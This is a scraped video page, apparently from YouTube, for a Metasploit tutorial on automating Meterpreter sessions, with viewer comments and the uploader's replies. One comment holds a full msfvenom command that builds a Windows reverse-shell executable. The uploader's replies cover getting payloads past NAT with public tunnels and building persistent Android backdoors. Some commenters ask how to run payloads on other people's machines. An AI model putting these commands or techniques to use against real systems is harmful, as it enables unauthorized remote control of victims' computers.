Launch an Automated Meterpreter Session

  Рет қаралды 14,619

Professor K

Professor K

Күн бұрын

Пікірлер: 39
@mulle5784
@mulle5784 5 ай бұрын
Thank you for not assuming we actually have a clue and taking the time to explain everything so simply!
@krah8052
@krah8052 5 ай бұрын
You're welcome.
@chadurdy7555
@chadurdy7555 3 жыл бұрын
🙈😎🙏🏾🙇🏽‍♂️🙏🏾 YOU ARE THE MAN!!! Thank you thank you thank you Professor K!! So concise and even toned exact presentation of guided steps. Literally from zero to end goal no fluff. Again thank you.
@chadurdy7555
@chadurdy7555 3 жыл бұрын
And I used windows 10!! As a target vmachine! Such masterful guidance.
@krah8052
@krah8052 3 жыл бұрын
Thanks!
@aritmistri8290
@aritmistri8290 2 жыл бұрын
Sir please help me how can i solve my metasploit session closed
@Dion8-sp3zk
@Dion8-sp3zk Жыл бұрын
very clear tutorial! thank you sir.
@Dede-id4cv
@Dede-id4cv Жыл бұрын
hello '' [*] Exploit completed, but no session was created. I get the error ' How can I fix it?
@Krz--ze4tl
@Krz--ze4tl 2 жыл бұрын
THANK YOU SO MUCH YOU ARE PROFESSIONAL🙏🙏
@krah8052
@krah8052 2 жыл бұрын
Thank you!
@mandamiddle0278
@mandamiddle0278 2 жыл бұрын
hoooly the voice so american based love that nice video KKONAW
@ellsi6372
@ellsi6372 Жыл бұрын
Thank you professor 🙏
@Yessir74680
@Yessir74680 2 жыл бұрын
I launched the meterpreter session and I ran the payload exe file and the meterpreter is taking forever to connect, even after clicking the payload exe file
@scammersexploited
@scammersexploited 2 жыл бұрын
How to you upgrade windows shell to meterpreter the msf module shell to meterpreter isn't working is their another module I can use ?
@musaalom350
@musaalom350 3 ай бұрын
hello professor, I am facing a problem. I want to discuss this with you. How is this possible?
@lutfianam1889
@lutfianam1889 2 жыл бұрын
how so that when there is a session or target trapped can be directly executed without us having to type?
@FadiCherif
@FadiCherif Жыл бұрын
It working in my computer only but if any computer open the file it doesnt work
@EM-do1yi
@EM-do1yi 3 жыл бұрын
thank you for this vid !
@krah8052
@krah8052 3 жыл бұрын
You're welcome!
@vivianxia4532
@vivianxia4532 2 жыл бұрын
THANK YOU!!!!
@felisclarke8090
@felisclarke8090 3 жыл бұрын
Hey professor K i’m new to kali Linux and I’m watching your video on how to open a meterpreter session but.. when I enter the first line of command -f is highlighted red, and does not work. I’m using Root@kali Thanks if you can help
@krah8052
@krah8052 3 жыл бұрын
Took some troubleshooting but the issue is kali will not accept the syntax for the -f if you copy and paste it into the CLI. You have to type in the entire command one letter at a time. I did confirm that this is the issue. Never had that issue before until the latest Kali update.
@felisclarke8090
@felisclarke8090 3 жыл бұрын
@@krah8052 thank you for getting back to me, I did type the syntax by hand 1 letter at a time but still doesn’t work I wrote it like this: msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx LPORT=4444 -f exe -o payload.exe But still -f is highlighted red?
@felisclarke8090
@felisclarke8090 3 жыл бұрын
​@@krah8052
@krah8052
@krah8052 3 жыл бұрын
@@felisclarke8090 If you type in the command leave the -f as is and you press enter, does the response come back showing a bunch of strange characters? If so, that is because the BASH shell is not taking either the letter - or the letter f using the current source or formatting for your text. It could be your keyboard layout. I've had this problem in the past where I had to open a text editor such as nano and type in the command. Change to the code type to something that the BASH shell would take. I was then able to copy and paste the command into the CLI.
@felisclarke8090
@felisclarke8090 3 жыл бұрын
@@krah8052 yes when I press enter on the syntax it does not save payload.exe and I get a spam of weird shapes and characters and symbols? Very strange
@felisclarke8090
@felisclarke8090 3 жыл бұрын
Ls-l is also saids command not found, any help would be greatly appreciated
@krah8052
@krah8052 3 жыл бұрын
You fat-fingered the syntax. You are missing the space between the letter s and the -I like so, ls -I.
@doomgloom7850
@doomgloom7850 3 жыл бұрын
Can u make tutorial on persitence payload on android?
@krah8052
@krah8052 3 жыл бұрын
pengs.win/how-to-make-a-persistent-android-backdoor-using-metasploit/
@doomgloom7850
@doomgloom7850 3 жыл бұрын
@@krah8052 have tried it thousands times. Didnt work
@krah8052
@krah8052 3 жыл бұрын
@@doomgloom7850 That's why I don't bother with making the lab. Most of the tutorials on the subject take you to the 99-yard line and drop off without crossing the finish line or completing the hack. Either that or they demonstrate the hack using an internal network. Hackersploit and other like channels don't bother with these types of labs because of the difficulty in getting them to work. Getting a reverse shell from a phone without first going through a web server on the Internet is not going to work. That's where this type of hack breaks down. The command and control to receive the reverse shell must be available on the Internet. If you are sitting behind a NAT network or a firewall, the hack will not work. For this, you would first need to direct the response from the phone to a secure tunnel on the Internet. You could then access the tunnel using a web page. ngrok.com/ tunnel.staqlab.com/ I demonstrate this in the following lab using a simple reverse shell. www.dropbox.com/s/thwrdy0bmayabno/Lab%20%20-%20Accessing%20Kali%20Across%20the%20WAN%20with%20NGROK.pdf?dl=0 kzbin.info/www/bejne/pqi3o4l3YriNgM0
@doomgloom7850
@doomgloom7850 3 жыл бұрын
@@krah8052 subscribed :)
Windows 7 Privilege Escalation Using UAC Bypass
5:11
Professor K
Рет қаралды 3,1 М.
How to Create Trojans Using Powershell
15:53
zSecurity
Рет қаралды 677 М.
How Many Balloons To Make A Store Fly?
00:22
MrBeast
Рет қаралды 108 МЛН
Миллионер | 3 - серия
36:09
Million Show
Рет қаралды 2 МЛН
Мама у нас строгая
00:20
VAVAN
Рет қаралды 10 МЛН
The Ultimate Sausage Prank! Watch Their Reactions 😂🌭 #Unexpected
00:17
La La Life Shorts
Рет қаралды 8 МЛН
Create windows backdoor using metasploit in kali linux | CEHv11
9:36
NT-Virtual Lab
Рет қаралды 62 М.
Access Location, Camera  & Mic of any Device 🌎🎤📍📷
15:48
zSecurity
Рет қаралды 2,6 МЛН
Create a Reverse Shell Using a Fake MP4 File [Tutorial]
11:56
Null Byte
Рет қаралды 154 М.
Creating a Persistent Backdoor Using Service Persistence
14:10
Professor K
Рет қаралды 6 М.
Heartbleed OpenSSL Exploit Vulnerability
17:52
Professor K
Рет қаралды 21 М.
Post Exploitation With Metasploit: Windows: Enabling Remote Desktop
3:59
Pentester Academy TV
Рет қаралды 16 М.
How Many Balloons To Make A Store Fly?
00:22
MrBeast
Рет қаралды 108 МЛН